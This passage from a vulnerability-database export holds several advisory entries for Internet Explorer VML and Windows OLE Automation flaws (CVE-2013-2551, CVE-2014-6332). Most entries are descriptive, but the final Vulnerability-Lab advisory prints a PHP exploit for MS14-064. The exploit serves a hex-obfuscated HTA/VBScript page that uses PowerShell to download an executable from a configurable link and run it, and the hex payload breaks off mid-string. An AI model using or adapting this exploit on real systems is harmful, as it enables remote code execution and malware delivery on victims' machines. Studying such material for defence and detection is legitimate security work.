"Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:2AEFC3D71E2274B2158FD88B4887ADBF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-01-26T11:36:31", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:87287166C5511F458A2B797E5A889BC8", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:C7EDBAF745A12B48814DE43223AAA600", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:4973412AEB13D8BC398B274492266AEC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:25", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:B956617792AC597CB312763B7C86DB9C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:41", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:A3620300B54852672908F617C4607F00", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nVUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML\r\nRemote Integer Overflow (MS13-037 / Pwn2Own)\r\n\r\nWebsite : http://www.vupen.com\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by an integer overflow error in the "vml.dll"\r\ncomponent when processing certain undocumented vector graphic properties,\r\nwhich could be exploited by remote attackers to leak arbitrary memory and\r\ncompromise a vulnerable system via a malicious web page.\r\n\r\nCVE: CVE-2013-2551\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 10\r\nMicrosoft Internet Explorer 9\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Internet Explorer 7\r\nMicrosoft Internet Explorer 6\r\n\r\nMicrosoft Windows RT\r\nMicrosoft Windows 8 for 32-bit Systems\r\nMicrosoft Windows 8 for x64-based Systems\r\nMicrosoft Windows Server 2012\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a fully functional\r\nremote code execution exploit will be available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code\r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the\r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS13-037 security updates.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Nicolas Joly of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leading provider of defensive and offensive cybersecurity\r\nintelligence and advanced vulnerability research. VUPEN solutions enable\r\ncorporations and governments to manage risks, and protect critical networks\r\nand infrastructures against known and unknown vulnerabilities.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2011-11-09 - Vulnerability Discovered by VUPEN\r\n2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013\r\n2013-05-20 - Public disclosure\r\n", "edition": 1, "cvss3": {}, "published": "2013-05-27T00:00:00", "title": "VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-05-27T00:00:00", "id": "SECURITYVULNS:DOC:29424", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29424", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\n\r\nDocument Title:\r\n===============\r\nMicrosoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1576\r\n\r\nVideo: http://youtu.be/Vkswz7vt23M\r\n\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332\r\n\r\nCVE-ID:\r\n=======\r\nCVE-2014-6332\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-08-15\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1576\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n9.3\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2015-08-15:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nOleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, \r\nWindows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by \r\nan array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation \r\nArray Remote Code Execution Vulnerability.\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts. \r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nManual steps to reproduce ...\r\n1 . Run php code : php hta.php\r\n2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip)\r\n3 . Open poc.hta\r\n4 . Your Link Download/Execute on your target\r\n5 . Finished \r\n\r\n#!/usr/bin/php\r\n<?php\r\n # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution\r\n # Tested on Windows 7 / Server 2008\r\n #\r\n #\r\n # Author : Mohammad Reza Espargham\r\n # Linkedin : https://ir.linkedin.com/in/rezasp\r\n # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\n # Website : www.reza.es\r\n # Twitter : https://twitter.com/rezesp\r\n # FaceBook : https://www.facebook.com/mohammadreza.espargham\r\n #\r\n #\r\n # MS14-064\r\n #\r\n #\r\n # 1 . run php code : php hta.php\r\n # 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip)\r\n # 3 . open poc.hta\r\n # 4 . Your Link Download/Execute on your target\r\n # 5 . Finished \r\n #\r\n # Demo : http://youtu.be/Vkswz7vt23M\r\n #\r\n \r\n \r\n \r\n \r\n $port=80; # Port Address\r\n $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link\r\n \r\n \r\n \r\n print " Mohammad Reza Espargham\n\n\n";\r\n \r\n $host= gethostname(); #g3th0stn4m3\r\n $ip = gethostbyname($host); #g3th0stbyn4m3\r\n \r\n print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n";\r\n \r\n $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');\r\n socket_bind($reza, 0,$port);\r\n socket_listen($reza);\r\n \r\n $msgd =\r\n "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".\r\n "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".\r\n "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".\r\n "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".\r\n "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".\r\n "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".\r\n "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".\r\n "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".\r\n "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".\r\n "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".\r\n "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".\r\n "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".\r\n "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".\r\n "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".\r\n "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".\r\n "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".\r\n "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".\r\n "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".\r\n "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".\r\n "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".\r\n "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".\r\n "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".\r\n "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".\r\n "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".\r\n "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".\r\n "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".\r\n "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".\r\n "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".\r\n "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".\r\n "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".\r\n "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".\r\n "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".\r\n "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".\r\n "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".\r\n "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".\r\n "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".\r\n "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".\r\n "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".\r\n "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".\r\n "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".\r\n "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".\r\n "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".\r\n "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".\r\n "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".\r\n "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".\r\n "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".\r\n "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".\r\n "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".\r\n "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".\r\n "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".\r\n "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".\r\n 